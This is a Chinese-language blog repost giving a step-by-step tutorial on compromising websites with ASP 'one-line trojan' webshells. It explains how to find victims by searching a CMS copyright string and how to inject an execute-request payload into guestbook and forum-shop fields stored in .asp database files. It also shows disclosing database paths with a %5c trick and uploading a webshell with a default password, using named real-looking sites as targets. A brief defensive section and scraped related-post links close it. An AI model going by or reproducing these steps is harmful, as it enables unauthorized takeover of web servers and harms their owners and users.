2019独角兽企业重金招聘Python工程师标准>>>

“EASYNEWS新闻管理系统 v1.01 正式版”是在企业网站中非常常见的一套整站模版,在该网站系统的留言本组件中就存在着数据过滤不严漏洞,如果网站是默认路径和默认文件名安装的话,入侵者可以利用该漏洞直接上传ASP木马程序控制整个网站服务器。
Step1 搜索入侵目标

使用了“EASYNEWS新闻管理系统 v1.01 正式版”的网站,在网站页面的底部版权声明处,往往会有关键字符为“WWW.52EASY.COM 版权所有”。只要在GOOGLE或百度中以该字符串为关键词进行搜索,就可以找到大量的入侵目标。

Step2 检测入侵条件

在这里,我们以网站“http://www.qswtj.com/news/index.htm”为例进行一次入侵检测。“EASYNEWS新闻管理系统”网站的留言本数据库文件默认是位于“\ebook\db\ebook.asp”,首先在浏览器地址栏中输入“http://www.qswtj.com/news/ebook/db/ebook.asp”,回车后在浏览器页面中将显示访问留言本数据库文件的返回信息。如果在页面中显示乱码,则说明该网站的留言本数据库文件没有改名,可以进行入侵。

Step3 在数据库中插入ASP后门

前面提到了该新闻系统的留言本插件存在过滤不严,因此我们可以通过提交发言,在数据库中插入“一句话木马”服务端代码:

在浏览器中访问“http://www.qswtj.com/news/khly.htm”,打开提交留言页面。在提交页面中的“主页”栏中,直接填写“一句话木马”服务端代码,其它随便填写。确定后点击“发表留言”按钮,文章发表成功后,即可将“一句话木马”服务端代码插入到留言本数据库中了。

Step4 连接后门上传Webshell

由于留言本数据库文件“ebook.asp”是一个ASP文件,所以我们插入到数据库文件中的ASP语句将会被执行。将“一句话木马”客户端中的提交地址改为留言本数据库文件地址,然后用浏览器打开客户端,在上方的输入框中输入上传ASP木马的保存路径,在下面的输入框中可以粘贴入其它的ASP木马代码,这里选择的是桂林老兵网站管理助手ASP代码。点击提交按钮后,刚才粘贴的ASP木马将被写入到论坛服务器中保存。

Step5 打开WEBSHELL

上传的ASP木马被保存到与数据库文件同一WEB目录下,文件名为“temp.asp”,因此我们在IE浏览器中打开页面“http://www.qswtj.com/news/ebook/db/temp.asp”,输入默认的密码“gxgl.com”,就可以看到一个WEBSHELL了。

在Webshell中可以上传其它的文件或者安装木马后门、执行各种命令等,网站的服务器已经掌握在我们的手中,可以为所欲为了。

实例二 “社区超市”入侵动网论坛

Step1 检测入侵条件

以入侵论坛“http://www.bbsok.com/”为例。首先在浏览器地址栏中输入“http://www.bbsok.com/data/shop.asp”,回车后在浏览器页面中将显示访问"shop.asp"文件的返回信息。说明该论坛的社区超市数据库文件没有改名或删除,可以进行入侵。

Step2 在数据库中插入ASP后门

登录论坛后,点击页面中的“娱乐”→“社区超市”,打开社区超市页面。在该页面中选择商店申请,打开“商店申请入驻”页面“http://www.bbsok.com/z_shop_newshop.asp”,在页面中填写任意信息,注意在“商店招牌”栏中,添加刚才的ASP代码"〈%execute request("l")%〉"。确定后点击“申请”按钮进行提交,即可将ASP代码保存在数据库文件中了。

后面的步骤就与上面介绍的一样了,只需要用蓝屏木马连接数据库文件“http://sdoygb.w2.dvbbs.net/data/shop.asp”,然后上传WEBSHELL就可以控制论坛服务器了。

实例三 “一句话木马”入侵未知网站

从上面的两个例子,我们可以看出利用“一句话木马”入侵控制存在数据库过滤不严漏洞的网站,成功的前提是一定要知道网站的数据库地址。对于一些使用了未知网页程序的网站,我们如何才能找到它的数据库地址呢?这就要结合暴库或者跨站之类的方法了,下面只是结合一个简单的暴库,介绍一下利用一句话木马入侵未知网站的方法。

Step1 暴库得到数据库路径

以“http://bbs.dwself.com”为例。在浏览器中打开“http://bbs.dwself.com/join/listall.asp?bid=2”,将地址栏中join后的/改为%5c,在提交后的返回返回信息中可以看到网站数据库地址:“’d:\wwwroot\shuilong\wwwroot\admin\adshuilonG!#).asp’”,数据库文件名中加入了“#”符号,“#”符号在IE中执行时被解释为中断符,要访问该数据库文件则必须将“#”号变为“23%”才可以。因此数据库文件的实际WEB地址为“http://bbs.dwself.com/join/admin/adshuilonG!%23).asp”

Step2 注册网站,插入“一句话木马”

由于数据库文件是ASP文件格式的,满足入侵条件,因此现在我们需要将“一句话木马”插入到数据库文件中去。

在网页上点击注册网站按钮,打开注册链接“http://bbs.dwself.com/join/add.asp?action=step3&bid=3”,在资料填写页面处的站点名称或地址中写入“一句话木马”服务端代码,其它随便填写。然后点击完成按钮提交数据,木马服务端就被插入到数据库文件中了。

最后只需要用蓝屏木马连接数据库文件“http://bbs.dwself.com/join/admin/adshuilonG!%23).asp”,然后上传ASP木马就可以控制该网站的服务器了。

“一句话木马”的防范

要防范“一句话木马”可以从两方面进行,首先是要隐藏网站的数据库,不要让攻击者知道数据库文件的链接地址。这就需要管理员在网页程序中查被暴库漏洞,在数据库连接文件中加入容错代码等,具体的防暴库方法在这里就不作过多的讲解了。

其次就是要防止用户提交的数据未过滤漏洞,对用户提交的数据进行过滤,替换一些危险的代码等。例如中国站长联盟网站在出现该漏洞后已经对网页程序进行的修补,插入的ASP代码中的〈、〉和"等字符会被网页程序转换成其它字符,致使服务端代码无法正常执行。

只要作好这两方面的安全工作,“一句话木马”虽然无孔不入,但是面对这样的网站系统也是无可奈何的了。

转载于:https://my.oschina.net/luckeytang/blog/1414

一句话木马使用方法总结相关推荐

  1. php图片一句话木马使用方法

    php图片一句话木马使用方法,PHP一句话:<?php @eval($_POST['shy']);?> 1.标准的写法,直接通过eval执行php代码@eval ($_POST['code ...

  2. java一句话木马连接_一句话木马使用方法总结

    "EASYNEWS新闻管理系统 v1.01 正式版"是在企业网站中非常常见的一套整站模版,在该网站系统的留言本组件中就存在着数据过滤不严漏洞,如果网站是默认路径和默认文件名安装的话 ...

  3. php一句话上传木马,一句话木马上传常见的几种方法

    1,利用00截断,brupsuite上传 利用00截断就是利用程序员在写程序时对文件的上传路径过滤不严格,产生0X00上传截断漏洞. 假设文件的上传路径为http://xx.xx.xx.xx/upfi ...

  4. php限制一个函数在几分钟内不被调用_在PHP一句话木马使用过程中的种种坑点分析...

    前言 在平时的学习和练习过程中,经常会遇到上传的一句话木马无法执行我们的命令或者说能执行命令但是不能连接菜刀蚁剑等webshell管理工具,以及各个版本PHP所限制的一些一句话木马的写法,不同版本we ...

  5. mysql定时木马_Mysql的语句生成后门木马的方法

    咳咳,大家看看就好了,本人不负责所产生的后果 复制代码 代码如下: SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702 ...

  6. 一句话木马绕过linux安全模式,一句话木马(webshell)是如何执行命令的

    在很多的渗透过程中,渗透人员会上传一句话木马(简称webshell)到目前web服务目录继而提权获取系统权限,不论asp.php.jsp.aspx都是如此,那么一句话木马到底是如何执行的呢,下面我们就 ...

  7. php一句话怎么写_PHP一句话木马后门

    在我们进行渗透测试的最后阶段,入侵到内网里,无论是想要浏览网站结构,还是抓取数据库,或者是挂个木马等等,到最后最常用的就是执行一句话木马,从客户端轻松连接服务器. 一句话木马的原理很简单,造型也很简单 ...

  8. php 一句话木马、后门

    强悍的PHP一句话后门 这类后门让网站.服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的.今天我们细数一些有意思的PHP一句话木马. 利用4 ...

  9. webshell、一句话木马的权限问题

    webshell一句话木马权限大小是由什么决定的. 前言 很基础篇原理文章,对于入门的新同学来说,大家可以没有去想过,或者默认就知道. 至少我刚开始疑惑去搜问题,网上其实并没有关于这个问题的解答,可能 ...

最新文章

  1. CMU赵越:关于数据挖掘的分享!
  2. loj6070【山东集训第一轮Day4】基因
  3. inputstream读取html乱码,java InputStream 读取汉语言内容的解决乱码
  4. ORA-00304: requested INSTANCE_NUMBER is busy
  5. Modelsim-Altera仿真设置
  6. vscode remote ssh_win10 下安装Vscode
  7. Unity3D基础34.1:打砖块小游戏优化
  8. mysql密码登陆过程_mysql单实例忘记密码如何登陆过程
  9. 北京,公交遭贼后…………[Teaks]
  10. 计算机相乘求和的函数,Excel五大求和操作,除了sum函数你知道有几个?-excel乘法函数...
  11. 汉字编码及显示原理总结
  12. #新学期,新FLAG#飞翔的小野猪
  13. 简单工厂模式在Logback源码以及JDK源码中的应用
  14. 图6——深度遍历无向图
  15. 各种Java加密算法-非对称加密
  16. 【JDK编译】Centos7编译OpenJDK7
  17. ORA-12899: value too large for column 问题解决
  18. 量化趣谈——不务正业的数学家James Simons
  19. 宝哥哔哔|去中心化借贷协议Trister‘s Lend主网已经上线全面内测已经开始!
  20. 期末大作业--德州扑克(包含双人手动发牌,多人手动发牌,多人手动、自动发牌三个版本)

热门文章

  1. 想为企业杜绝钓鱼邮件,ValiMail 获1200万美元A轮融资
  2. VMware安装RedHat 6(64位)报错问题
  3. [R语言画图]气泡图symbols
  4. every day english
  5. ipch文件夹和.sdf文件
  6. 在 SharePoint2010 中使用 XML 查看器取得其他站点的内容列表
  7. java B2B2C Springcloud电子商城系统-断路器(Hystrix)
  8. mipi屏在内核可以显示logo但是u-boot无法显示的问题【转】
  9. Oracle Rac 11R2添加节点
  10. 126篇殿堂级深度学习论文分类整理 从入门到应用 | 干货